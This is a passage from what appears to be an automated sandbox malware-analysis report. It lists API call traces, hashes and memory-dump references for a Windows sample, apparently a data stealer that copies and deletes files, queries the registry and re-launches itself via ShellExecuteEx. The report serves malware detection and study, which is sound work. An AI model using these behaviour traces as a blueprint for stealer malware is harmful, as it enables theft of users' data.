                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3466090806-0
                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                        • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                        • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F799B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F79A2
                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022F7920), ref: 022F79C2
                                        • RegQueryValueExA.ADVAPI32(022F7920,00420AAC,00000000,00000000,?,000000FF), ref: 022F79E1
                                        • RegCloseKey.ADVAPI32(022F7920), ref: 022F79EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                        • Instruction ID: 9f149a9607a88dc5d162e52cf35de991a2837788ad5084777602d06450776d22
                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                        • Instruction Fuzzy Hash: 0401FFB9A80308BFEB10DFE4DD4AFAEB7B9EB48701F104559FA05A7284D67596008F52
                                        APIs
                                        • StrStrA.SHLWAPI(0085FDB8,?,?,?,0041140C,?,0085FDB8,00000000), ref: 0041926C
                                        • lstrcpyn.KERNEL32(0064AB88,0085FDB8,0085FDB8,?,0041140C,?,0085FDB8), ref: 00419290
                                        • lstrlenA.KERNEL32(?,?,0041140C,?,0085FDB8), ref: 004192A7
                                        • wsprintfA.USER32 ref: 004192C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                        • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                        • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                        • RegCloseKey.ADVAPI32(?), ref: 022E1566
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                        • Instruction ID: 1941fffdd0fdb456d5666f97491d347a127cb04a2569af42e171ea8f319d9346
                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                        • Instruction Fuzzy Hash: 340131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0697280D6749A018F91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                        • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                        • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3466090806-0
                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                        • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                        • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                        APIs
                                        • __getptd.LIBCMT ref: 022FC9B5
                                          • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                          • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                                        • __getptd.LIBCMT ref: 022FC9CC
                                        • __amsg_exit.LIBCMT ref: 022FC9DA
                                        • __lock.LIBCMT ref: 022FC9EA
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 022FC9FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                        • Instruction ID: e73fc6b66c09435d46262739e74c1bef74f64775c9a33253b0a86bc9fa9b20be
                                        • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                        • Instruction Fuzzy Hash: A0F0F6329603089BD7B0FBE8940272DB3A1AF04B28F10013BDA14A62D8CBA41400DF59
                                        APIs
                                        • __getptd.LIBCMT ref: 0041C74E
                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                        • __getptd.LIBCMT ref: 0041C765
                                        • __amsg_exit.LIBCMT ref: 0041C773
                                        • __lock.LIBCMT ref: 0041C783
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                        • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                                        • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                        • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,00859F08), ref: 0041079A
                                        • StrCmpCA.SHLWAPI(00000000,00859FE8), ref: 00410866
                                        • StrCmpCA.SHLWAPI(00000000,00859F18), ref: 0041099D
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy
                                        • String ID: `_A
                                        • API String ID: 3722407311-2339250863
                                        • Opcode ID: bf080a297ed6aa4160d2d0afc8af9375ae405173caffd8e67d794de8aa9ce9dc
                                        • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                        • Opcode Fuzzy Hash: bf080a297ed6aa4160d2d0afc8af9375ae405173caffd8e67d794de8aa9ce9dc
                                        • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,00859F08), ref: 0041079A
                                        • StrCmpCA.SHLWAPI(00000000,00859FE8), ref: 00410866
                                        • StrCmpCA.SHLWAPI(00000000,00859F18), ref: 0041099D
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy
                                        • String ID: `_A
                                        • API String ID: 3722407311-2339250863
                                        • Opcode ID: a101c8d79d1e333703f1e59386de941e3a4aedcf987459cba373c12b782e3e15
                                        • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                        • Opcode Fuzzy Hash: a101c8d79d1e333703f1e59386de941e3a4aedcf987459cba373c12b782e3e15
                                        • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022F68CA
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 022F698D
                                        • ExitProcess.KERNEL32 ref: 022F69BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                        • Instruction ID: a497d63774b96b45848fc12dd20ea59b412fa38e5baa543e264ef2daa43bde68
                                        • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                        • Instruction Fuzzy Hash: D63144B5810308ABDB54EFD0CD95FDEB77AAF04300F4041A8E309A2194DB746B88CF59
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                        • ExitProcess.KERNEL32 ref: 00416755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: 11da27257ef4295641830561aa9d624328c969808ba5010ef3ce6af93b2b9ea1
                                        • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                        • Opcode Fuzzy Hash: 11da27257ef4295641830561aa9d624328c969808ba5010ef3ce6af93b2b9ea1
                                        • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: @Jn@$Jn@$Jn@
                                        • API String ID: 544645111-1180188686
                                        • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                        • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                        • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                        • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                        APIs
                                        • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcatlstrcpy
                                        • String ID: vI@$vI@
                                        • API String ID: 3905823039-1245421781
                                        • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                        • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                        • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                        • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                        • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                        • wsprintfW.USER32 ref: 00418D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 659108358-2783943728
                                        • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                        • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                        • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                        • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EA548
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 022EA666
                                        • lstrlen.KERNEL32(00000000), ref: 022EA923
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                        • DeleteFileA.KERNEL32(00000000), ref: 022EA9AA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                        • String ID:
                                        • API String ID: 257331557-0
                                        • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                        • Instruction ID: 66f77940b23073e5b8f163c018d07ff7b1b205f51a9e2381ab5119a804011f84
                                        • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                        • Instruction Fuzzy Hash: 4DE1D0729203189BCB55EBE4DD91DEEF33AAF24700F508169E21A72194EF346A4CCF61
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                        • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                        • String ID:
                                        • API String ID: 257331557-0
                                        • Opcode ID: 996677af85f54e79b003a3692609f9076375b49c287e169c65d33e3842627d76
                                        • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                        • Opcode Fuzzy Hash: 996677af85f54e79b003a3692609f9076375b49c287e169c65d33e3842627d76
                                        • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED6E8
                                        • lstrlen.KERNEL32(00000000), ref: 022ED8FF
                                        • lstrlen.KERNEL32(00000000), ref: 022ED913
                                        • DeleteFileA.KERNEL32(00000000), ref: 022ED992
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                        • Instruction ID: 16f0b493b00f36047ccff397e235a7e8bab34b486e35654506b43f6b36b20b03
